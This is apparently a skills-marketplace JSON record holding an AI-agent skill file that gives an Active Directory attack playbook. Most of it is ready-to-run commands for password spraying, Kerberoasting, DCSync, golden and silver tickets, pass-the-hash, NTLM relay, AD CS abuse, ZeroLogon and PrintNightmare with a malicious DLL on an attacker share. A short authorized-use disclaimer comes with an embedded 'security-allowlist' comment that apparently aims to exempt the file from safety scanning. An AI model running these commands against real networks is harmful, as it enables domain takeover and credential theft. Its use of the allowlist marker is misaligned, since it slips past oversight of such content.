[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"skill-19a2ca2f-90f2-4942-b391-64a27cc1035a":3,"$fs9QLv_PLQ7q-1qH93AMfXRUqUoLHvabcn0l6hiM7Loo":43},{"id":4,"title":5,"description":6,"categoryId":7,"moduleId":8,"tags":9,"prompt":10,"icon":11,"source":12,"sourceUrl":13,"authorId":14,"authorName":15,"isPublic":16,"stars":17,"runs":18,"createdAt":19,"updatedAt":19,"module":20,"category":27,"packages":34},"19a2ca2f-90f2-4942-b391-64a27cc1035a","active-directory-attacks","Provides comprehensive attack techniques for Microsoft Active Directory environments. Covers reconnaissance, credential harvesting, Kerberos attacks, lateral movement, privilege escalation, and domain dominance, for red team operations and penetration testing.","cat_writing_copywriting","mod_writing","sickn33,writing","---\nname: active-directory-attacks\ndescription: \"Provide comprehensive techniques for attacking Microsoft Active Directory environments. Covers reconnaissance, credential harvesting, Kerberos attacks, lateral movement, privilege escalation, and domain dominance for red team operations and penetration testing.\"\nrisk: offensive\nsource: community\nauthor: zebbern\ndate_added: \"2026-02-27\"\n---\n\n> AUTHORIZED USE ONLY: Use this skill only for authorized security assessments, defensive validation, or controlled educational environments.\n\n\u003C!-- security-allowlist: credential-extraction, kerberos-attacks -->\n\n# Active Directory Attacks\n\n## Purpose\n\nProvide comprehensive techniques for attacking Microsoft Active Directory environments. 
Covers reconnaissance, credential harvesting, Kerberos attacks, lateral movement, privilege escalation, and domain dominance for red team operations and penetration testing.\n\n## Inputs\u002FPrerequisites\n\n- Kali Linux or Windows attack platform\n- Domain user credentials (for most attacks)\n- Network access to Domain Controller\n- Tools: Impacket, Mimikatz, BloodHound, Rubeus, CrackMapExec\n\n## Outputs\u002FDeliverables\n\n- Domain enumeration data\n- Extracted credentials and hashes\n- Kerberos tickets for impersonation\n- Domain Administrator access\n- Persistent access mechanisms\n\n---\n\n## Essential Tools\n\n| Tool | Purpose |\n|------|---------|\n| BloodHound | AD attack path visualization |\n| Impacket | Python AD attack tools |\n| Mimikatz | Credential extraction |\n| Rubeus | Kerberos attacks |\n| CrackMapExec | Network exploitation |\n| PowerView | AD enumeration |\n| Responder | LLMNR\u002FNBT-NS poisoning |\n\n---\n\n## Core Workflow\n\n### Step 1: Kerberos Clock Sync\n\nKerberos requires clock synchronization (±5 minutes):\n\n```bash\n# Detect clock skew\nnmap -sT 10.10.10.10 -p445 --script smb2-time\n\n# Fix clock on Linux\nsudo date -s \"14 APR 2024 18:25:16\"\n\n# Fix clock on Windows\nnet time \u002Fdomain \u002Fset\n\n# Fake clock without changing system time\nfaketime -f '+8h' \u003Ccommand>\n```\n\n### Step 2: AD Reconnaissance with BloodHound\n\n```bash\n# Start BloodHound\nneo4j console\nbloodhound --no-sandbox\n\n# Collect data with SharpHound\n.\\SharpHound.exe -c All\n.\\SharpHound.exe -c All --ldapusername user --ldappassword pass\n\n# Python collector (from Linux)\nbloodhound-python -u 'user' -p 'password' -d domain.local -ns 10.10.10.10 -c all\n```\n\n### Step 3: PowerView Enumeration\n\n```powershell\n# Get domain info\nGet-NetDomain\nGet-DomainSID\nGet-NetDomainController\n\n# Enumerate users\nGet-NetUser\nGet-NetUser -SamAccountName targetuser\nGet-UserProperty -Properties pwdlastset\n\n# Enumerate groups\nGet-NetGroupMember 
-GroupName \"Domain Admins\"\nGet-DomainGroup -Identity \"Domain Admins\" | Select-Object -ExpandProperty Member\n\n# Find local admin access\nFind-LocalAdminAccess -Verbose\n\n# User hunting\nInvoke-UserHunter\nInvoke-UserHunter -Stealth\n```\n\n---\n\n## Credential Attacks\n\n### Password Spraying\n\n```bash\n# Using kerbrute\n.\u002Fkerbrute passwordspray -d domain.local --dc 10.10.10.10 users.txt Password123\n\n# Using CrackMapExec\ncrackmapexec smb 10.10.10.10 -u users.txt -p 'Password123' --continue-on-success\n```\n\n### Kerberoasting\n\nExtract service account TGS tickets and crack offline:\n\n```bash\n# Impacket\nGetUserSPNs.py domain.local\u002Fuser:password -dc-ip 10.10.10.10 -request -outputfile hashes.txt\n\n# Rubeus\n.\\Rubeus.exe kerberoast \u002Foutfile:hashes.txt\n\n# CrackMapExec\ncrackmapexec ldap 10.10.10.10 -u user -p password --kerberoast output.txt\n\n# Crack with hashcat\nhashcat -m 13100 hashes.txt rockyou.txt\n```\n\n### AS-REP Roasting\n\nTarget accounts with \"Do not require Kerberos preauthentication\":\n\n```bash\n# Impacket\nGetNPUsers.py domain.local\u002F -usersfile users.txt -dc-ip 10.10.10.10 -format hashcat\n\n# Rubeus\n.\\Rubeus.exe asreproast \u002Fformat:hashcat \u002Foutfile:hashes.txt\n\n# Crack with hashcat\nhashcat -m 18200 hashes.txt rockyou.txt\n```\n\n### DCSync Attack\n\nExtract credentials directly from DC (requires Replicating Directory Changes rights):\n\n```bash\n# Impacket\nsecretsdump.py domain.local\u002Fadmin:password@10.10.10.10 -just-dc-user krbtgt\n\n# Mimikatz\nlsadump::dcsync \u002Fdomain:domain.local \u002Fuser:krbtgt\nlsadump::dcsync \u002Fdomain:domain.local \u002Fuser:Administrator\n```\n\n---\n\n## Kerberos Ticket Attacks\n\n### Pass-the-Ticket (Golden Ticket)\n\nForge TGT with krbtgt hash for any user:\n\n```powershell\n# Get krbtgt hash via DCSync first\n# Mimikatz - Create Golden Ticket\nkerberos::golden \u002Fuser:Administrator \u002Fdomain:domain.local \u002Fsid:S-1-5-21-xxx \u002Fkrbtgt:HASH 
\u002Fid:500 \u002Fptt\n\n# Impacket\nticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-xxx -domain domain.local Administrator\nexport KRB5CCNAME=Administrator.ccache\npsexec.py -k -no-pass domain.local\u002FAdministrator@dc.domain.local\n```\n\n### Silver Ticket\n\nForge TGS for specific service:\n\n```powershell\n# Mimikatz\nkerberos::golden \u002Fuser:Administrator \u002Fdomain:domain.local \u002Fsid:S-1-5-21-xxx \u002Ftarget:server.domain.local \u002Fservice:cifs \u002Frc4:SERVICE_HASH \u002Fptt\n```\n\n### Pass-the-Hash\n\n```bash\n# Impacket\npsexec.py domain.local\u002FAdministrator@10.10.10.10 -hashes :NTHASH\nwmiexec.py domain.local\u002FAdministrator@10.10.10.10 -hashes :NTHASH\nsmbexec.py domain.local\u002FAdministrator@10.10.10.10 -hashes :NTHASH\n\n# CrackMapExec\ncrackmapexec smb 10.10.10.10 -u Administrator -H NTHASH -d domain.local\ncrackmapexec smb 10.10.10.10 -u Administrator -H NTHASH --local-auth\n```\n\n### OverPass-the-Hash\n\nConvert NTLM hash to Kerberos ticket:\n\n```bash\n# Impacket\ngetTGT.py domain.local\u002Fuser -hashes :NTHASH\nexport KRB5CCNAME=user.ccache\n\n# Rubeus\n.\\Rubeus.exe asktgt \u002Fuser:user \u002Frc4:NTHASH \u002Fptt\n```\n\n---\n\n## NTLM Relay Attacks\n\n### Responder + ntlmrelayx\n\n```bash\n# Start Responder (disable SMB\u002FHTTP for relay)\nresponder -I eth0 -wrf\n\n# Start relay\nntlmrelayx.py -tf targets.txt -smb2support\n\n# LDAP relay for delegation attack\nntlmrelayx.py -t ldaps:\u002F\u002Fdc.domain.local -wh attacker-wpad --delegate-access\n```\n\n### SMB Signing Check\n\n```bash\ncrackmapexec smb 10.10.10.0\u002F24 --gen-relay-list targets.txt\n```\n\n---\n\n## Certificate Services Attacks (AD CS)\n\n### ESC1 - Misconfigured Templates\n\n```bash\n# Find vulnerable templates\ncertipy find -u user@domain.local -p password -dc-ip 10.10.10.10\n\n# Exploit ESC1\ncertipy req -u user@domain.local -p password -ca CA-NAME -target dc.domain.local -template VulnTemplate -upn administrator@domain.local\n\n# 
Authenticate with certificate\ncertipy auth -pfx administrator.pfx -dc-ip 10.10.10.10\n```\n\n### ESC8 - Web Enrollment Relay\n\n```bash\nntlmrelayx.py -t http:\u002F\u002Fca.domain.local\u002Fcertsrv\u002Fcertfnsh.asp -smb2support --adcs --template DomainController\n```\n\n---\n\n## Critical CVEs\n\n### ZeroLogon (CVE-2020-1472)\n\n```bash\n# Check vulnerability\ncrackmapexec smb 10.10.10.10 -u '' -p '' -M zerologon\n\n# Exploit\npython3 cve-2020-1472-exploit.py DC01 10.10.10.10\n\n# Extract hashes\nsecretsdump.py -just-dc domain.local\u002FDC01\\$@10.10.10.10 -no-pass\n\n# Restore password (important!)\npython3 restorepassword.py domain.local\u002FDC01@DC01 -target-ip 10.10.10.10 -hexpass HEXPASSWORD\n```\n\n### PrintNightmare (CVE-2021-1675)\n\n```bash\n# Check for vulnerability\nrpcdump.py @10.10.10.10 | grep 'MS-RPRN'\n\n# Exploit (requires hosting malicious DLL)\npython3 CVE-2021-1675.py domain.local\u002Fuser:pass@10.10.10.10 '\\\\attacker\\share\\evil.dll'\n```\n\n### samAccountName Spoofing (CVE-2021-42278\u002F42287)\n\n```bash\n# Automated exploitation\npython3 sam_the_admin.py \"domain.local\u002Fuser:password\" -dc-ip 10.10.10.10 -shell\n```\n\n---\n\n## Quick Reference\n\n| Attack | Tool | Command |\n|--------|------|---------|\n| Kerberoast | Impacket | `GetUserSPNs.py domain\u002Fuser:pass -request` |\n| AS-REP Roast | Impacket | `GetNPUsers.py domain\u002F -usersfile users.txt` |\n| DCSync | secretsdump | `secretsdump.py domain\u002Fadmin:pass@DC` |\n| Pass-the-Hash | psexec | `psexec.py domain\u002Fuser@target -hashes :HASH` |\n| Golden Ticket | Mimikatz | `kerberos::golden \u002Fuser:Admin \u002Fkrbtgt:HASH` |\n| Spray | kerbrute | `kerbrute passwordspray -d domain users.txt Pass` |\n\n---\n\n## Constraints\n\n**Must:**\n- Synchronize time with DC before Kerberos attacks\n- Have valid domain credentials for most attacks\n- Document all compromised accounts\n\n**Must Not:**\n- Lock out accounts with excessive password spraying\n- Modify production 
AD objects without approval\n- Leave Golden Tickets without documentation\n\n**Should:**\n- Run BloodHound for attack path discovery\n- Check for SMB signing before relay attacks\n- Verify patch levels for CVE exploitation\n\n---\n\n## Examples\n\n### Example 1: Domain Compromise via Kerberoasting\n\n```bash\n# 1. Find service accounts with SPNs\nGetUserSPNs.py domain.local\u002Flowpriv:password -dc-ip 10.10.10.10\n\n# 2. Request TGS tickets\nGetUserSPNs.py domain.local\u002Flowpriv:password -dc-ip 10.10.10.10 -request -outputfile tgs.txt\n\n# 3. Crack tickets\nhashcat -m 13100 tgs.txt rockyou.txt\n\n# 4. Use cracked service account\npsexec.py domain.local\u002Fsvc_admin:CrackedPassword@10.10.10.10\n```\n\n### Example 2: NTLM Relay to LDAP\n\n```bash\n# 1. Start relay targeting LDAP\nntlmrelayx.py -t ldaps:\u002F\u002Fdc.domain.local --delegate-access\n\n# 2. Trigger authentication (e.g., via PrinterBug)\npython3 printerbug.py domain.local\u002Fuser:pass@target 10.10.10.12\n\n# 3. Use created machine account for RBCD attack\n```\n\n---\n\n## Troubleshooting\n\n| Issue | Solution |\n|-------|----------|\n| Clock skew too great | Sync time with DC or use faketime |\n| Kerberoasting returns empty | No service accounts with SPNs |\n| DCSync access denied | Need Replicating Directory Changes rights |\n| NTLM relay fails | Check SMB signing, try LDAP target |\n| BloodHound empty | Verify collector ran with correct creds |\n\n---\n\n## Additional Resources\n\nFor advanced techniques including delegation attacks, GPO abuse, RODC attacks, SCCM\u002FWSUS deployment, ADCS exploitation, trust relationships, and Linux AD integration, see [references\u002Fadvanced-attacks.md](references\u002Fadvanced-attacks.md).\n\n## When to Use\nThis skill is applicable to execute the workflow or actions described in the overview.\n","","imported","https:\u002F\u002Fgithub.com\u002Fsickn33\u002Fantigravity-awesome-skills","user_system_seed","SkillOPIC",true,163,2025,"2026-05-16 
13:00:46",{"id":8,"name":21,"slug":22,"icon":23,"description":24,"sort":25,"createdAt":26},"Writing and Research","writing","mdi-pencil-outline","From academic writing to creative copy, let AI be your dedicated writing assistant",1,"2026-05-16 12:53:40",{"id":7,"name":28,"slug":29,"icon":30,"description":31,"moduleId":8,"sort":32,"skillCount":33,"createdAt":26},"Copywriting","copywriting","mdi-comment-text-outline","Ad copy, brand stories, slogans",4,72,[35],{"id":36,"skillId":4,"version":37,"fileName":38,"fileSize":39,"filePath":40,"fileHash":41,"manifest":42,"createdAt":19},"10c202ac-6e3d-41e6-b770-acbf79df0792","1.0.0","active-directory-attacks.zip",7726,"uploads\u002Fskills\u002F19a2ca2f-90f2-4942-b391-64a27cc1035a\u002Factive-directory-attacks.zip","cb0884f4cfd9dc0736dd1d4e59ea9944f8e433ca416b2fcbf353b71d5967a3c3","[{\"path\":\"SKILL.md\",\"isDirectory\":false,\"size\":9831},{\"path\":\"references\u002Fadvanced-attacks.md\",\"isDirectory\":false,\"size\":9996}]",{"code":44,"message":45,"data":46},200,"success",{"items":47,"stats":48,"page":51},[],{"averageRating":49,"totalRatings":49,"ratingCounts":50},0,[49,49,49,49,49],{"limit":52,"offset":49,"hasMore":53,"nextOffset":52,"ratedOnly":16},15,false]